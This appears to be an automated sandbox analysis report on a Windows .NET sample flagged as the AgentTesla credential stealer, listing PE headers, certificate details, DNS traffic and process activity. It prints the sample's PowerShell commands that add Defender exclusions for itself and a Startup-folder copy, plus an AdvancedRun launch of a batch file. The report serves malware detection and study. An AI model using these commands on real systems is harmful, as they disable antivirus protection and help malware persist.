                                                                                                                  Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                                  Error Number:-2146762495
                                                                                                                  Not Before, Not After
                                                                                                                  • 7/7/2021 5:00:00 PM 7/8/2022 4:59:59 PM
                                                                                                                  Subject Chain
                                                                                                                  • CN=Afia Wave Enterprises Oy, O=Afia Wave Enterprises Oy, L=Helsinki, S=Uusimaa, C=FI
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:4D53204310277C51FA444D3365AA03EB
                                                                                                                  Thumbprint SHA-1:9B6F3B3CD33AE938FBC5C95B8C9239BAC9F9F7BF
                                                                                                                  Thumbprint SHA-256:999BBF99F3B3C1A894340918D8F2C6A358E7EC6299BAB5D8FD6B9E7570ABF929
                                                                                                                  Serial:69AD1E8B5941C93D5017B7C3FDB8E7B6

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xbe5240x4a.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x548.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xbd2000x15b8
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xbe56e0x38.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000xbc61f0xbc800False0.683798387765data6.54480652583IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xc00000x5480x600False0.333984375data3.74389579657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xc20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_GROUP_ICON0xc00a00x6data
                                                                                                                  RT_VERSION0xc00a80x49edata

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Version Infos

                                                                                                                  DescriptionData
                                                                                                                  Translation0x0000 0x04b0
                                                                                                                  LegalCopyright Microsoft Corporation.All rights reserved.
                                                                                                                  Assembly Version15.3.0.0
                                                                                                                  InternalNameMicrosoft.VisualStudio.DevOps.Telemetry.dll
                                                                                                                  FileVersion0.4.13.22810
                                                                                                                  CompanyNameMicrosoft Corporation
                                                                                                                  CommentsMicrosoft.VisualStudio.DevOps.Telemetry
                                                                                                                  ProductNameMicrosoft Visual Studio
                                                                                                                  ProductVersion0.4.13+g1a59147604.22810
                                                                                                                  FileDescriptionMicrosoft.VisualStudio.DevOps.Telemetry
                                                                                                                  OriginalFilenameMicrosoft.VisualStudio.DevOps.Telemetry.dll

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 15, 2021 15:20:21.145026922 CEST6544753192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:21.173506975 CEST53654478.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:38.187390089 CEST5244153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:38.242679119 CEST53524418.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:56.416903019 CEST6217653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:56.443344116 CEST53621768.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:20:56.602914095 CEST5959653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:20:56.630760908 CEST53595968.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:14.728933096 CEST6529653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:14.756941080 CEST53652968.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:18.132777929 CEST6318353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:18.163100004 CEST53631838.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:24.774127960 CEST6015153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:24.800704956 CEST53601518.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:25.923398972 CEST5696953192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:25.970354080 CEST53569698.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:33.151094913 CEST5516153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:33.177848101 CEST53551618.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:21:41.321341038 CEST5475753192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:21:41.357259035 CEST53547578.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:04.617964983 CEST4999253192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:04.654059887 CEST53499928.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:18.271564007 CEST6007553192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:18.317687988 CEST53600758.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:22.083347082 CEST5501653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:22.119514942 CEST53550168.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:33.184061050 CEST6434653192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:33.213447094 CEST53643468.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:39.139003992 CEST5712853192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:39.166477919 CEST53571288.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.278376102 CEST5046353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.278419018 CEST5479153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.302717924 CEST53547918.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.303340912 CEST53504638.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:40.340203047 CEST5039453192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:40.367719889 CEST53503948.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:44.756346941 CEST5853053192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:44.787528038 CEST53585308.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:44.838032007 CEST5381353192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:44.864212036 CEST53538138.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:45.009485960 CEST6373253192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:45.036564112 CEST53637328.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:45.690366030 CEST5734453192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:45.719934940 CEST53573448.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:50.835201979 CEST5445053192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:50.862657070 CEST53544508.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:53.097054005 CEST5926153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:53.130618095 CEST53592618.8.8.8192.168.2.5
                                                                                                                  Sep 15, 2021 15:22:56.630136967 CEST5715153192.168.2.58.8.8.8
                                                                                                                  Sep 15, 2021 15:22:56.660283089 CEST53571518.8.8.8192.168.2.5

                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Start time:15:20:26
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\VknMvPoCXZ.exe'
                                                                                                                  Imagebase:0x200000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:34
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:38
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, Metadefender, Browse
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:20:41
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  General

                                                                                                                  Start time:15:20:44
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:46
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

